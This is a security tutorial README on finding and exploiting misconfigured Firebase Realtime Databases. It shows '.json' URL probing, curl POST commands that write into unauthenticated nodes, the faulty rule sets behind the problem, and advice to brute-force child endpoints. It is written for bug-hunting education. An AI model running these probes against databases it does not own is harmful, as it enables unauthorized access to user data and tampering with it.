├── README.md
└── api-restrict.png


/README.md:
--------------------------------------------------------------------------------
  1 | # Insecure-Firebase
  2 | 
  3 | ### Case 1:
  4 | 
  5 | ### Allows Anonymous read and write or only read access 
  6 | 
  7 | Add '.json' at the end of database url if you see `null` or `<data>` in response that means database is insecure and anyone can read/write into database.
  8 | 
  9 | For example: https://insecure-firebase.firebaseio.com/.json returns `null`
 10 | 
 11 | 
 12 | #### POC (Insert data)
 13 | ```
 14 | curl -X POST https://insecure-firebase.firebaseio.com/testing.json \
 15 | -d '{"cat": "meow", "dog": "bowbow"}'
 16 | ```
 17 | This will create a new data location `/testing` in database
 18 | 
 19 | Now visit https://insecure-firebase.firebaseio.com/testing.json or https://insecure-firebase.firebaseio.com/.json
 20 | 
 21 | and you will see new data is added to database
 22 | 
 23 | 
 24 | 
 25 | Firebase configuration rules which leads to this vulnerability
 26 | 
 27 | ```
 28 | {
 29 |   /* Visit https://firebase.google.com/docs/database/security to learn more about security rules. */
 30 |   "rules": {
 31 |     ".read": true,
 32 |     ".write": true
 33 |   }
 34 | }
 35 | ```
 36 | As you can see in the above configuration both read and write set to true which means anyone can read and write to
 37 | this firebase database, developer some times use this settings for testing purpose but letter forgets to change this
 38 | to only allow app users to read or write data (rare to find).
 39 | 
 40 | ### Case 2:
 41 | 
 42 | ### When the child is specified with no auth
 43 | 
 44 | When testing firebase database what i was doing before is adding .json at the end of database url if it returns `null` or any data then it means that database is vulnerable but if it returns `permission denied` then it means database is secure.
 45 | 
 46 | Then I watched a video shared by [@B3nac](https://twitter.com/B3nac)
 47 |  where he showed that developer can set rules for child nodes also. Like this:
 48 | 
 49 | ```
 50 | {
 51 |   /* Visit https://firebase.google.com/docs/database/security to learn more about security rules. */
 52 |   "rules": {
 53 |     "Admin": {
 54 |     ".read": false,
 55 |     ".write": false
 56 |     },
 57 |     "Users": {
 58 |       ".read": true,
 59 |       ".write": false
 60 |     }
 61 |   }
 62 | }
 63 | ```
 64 | 
 65 | For the purpose of demonstration i deployed a firebase database with the above rules so if you go to 
 66 | 
 67 | `https://in-firebase-683e6.firebaseio.com/.json` 
 68 | 
 69 | you will get `permission denied` error but if you go to https://in-firebase-683e6.firebaseio.com/Users.json you will get user data which is exposed due to rule set on `Users` node. So we can bruteforce endpoints to find other vulnerable endpoints.
 70 | 
 71 | 
 72 | Then I thought that developer can also set only write access to an endpoint which means if we go to that endpoint we will get `permission denied` error but if we try to write some data we can write. The permission rule at development end will look like this:
 73 | 
 74 | ```
 75 | {
 76 |   /* Visit https://firebase.google.com/docs/database/security to learn more about security rules. */
 77 |   "rules": {
 78 |     "Logs": {
 79 |       ".read": false,
 80 |       ".write": true
 81 |     }
 82 |   }
 83 | }
 84 | ```
 85 | 
 86 | Here developer sets the write rule at `Logs` endpoint, So if you go to https://in-firebase-683e6.firebaseio.com/Logs.json you will get `permission denied` error but you can write data to it. 
 87 | 
 88 | Example:
 89 | ```
 90 | curl -X POST https://in-firebase-683e6.firebaseio.com/Logs.json -d '{"test": "testing"}'
 91 | ```
 92 | 
 93 | If you run the above command you will get something like this in response `{"name":"-M3B_iyZE1RPDaPNuknX"}` which means write is successfull.
 94 | 
 95 | 
 96 | ## Exploiting with Firebase API key
 97 | 
 98 | ```
 99 | Currently working on this I will add more details later 
100 | ```
101 | Developer can restrict api key to control which website, IP address or application can use API key 
102 | ![alt api-restriction](https://raw.githubusercontent.com/tauh33dkhan/Hacking-Insecure-Firebase-Database/master/api-restrict.png)
103 | 
104 | ### Extra
105 | 
106 | Recovering Firebase remote config: https://blog.deesee.xyz/android/automation/2019/08/03/firebase-remote-config-dump.html
107 | 
108 | ### Note
109 | Please setup your own database and test on it before palying with production database because one mistake can mess all the data out there.
110 | 
111 | #### Contact Me
112 | [@tauh33dkhan](https://twitter.com/tauh33dkhan)
113 | 


--------------------------------------------------------------------------------
/api-restrict.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tauh33dkhan/Hacking-Insecure-Firebase-Database/cfcb91f0ade0dfa41dfee1c4d484be3f0571ed1c/api-restrict.png


--------------------------------------------------------------------------------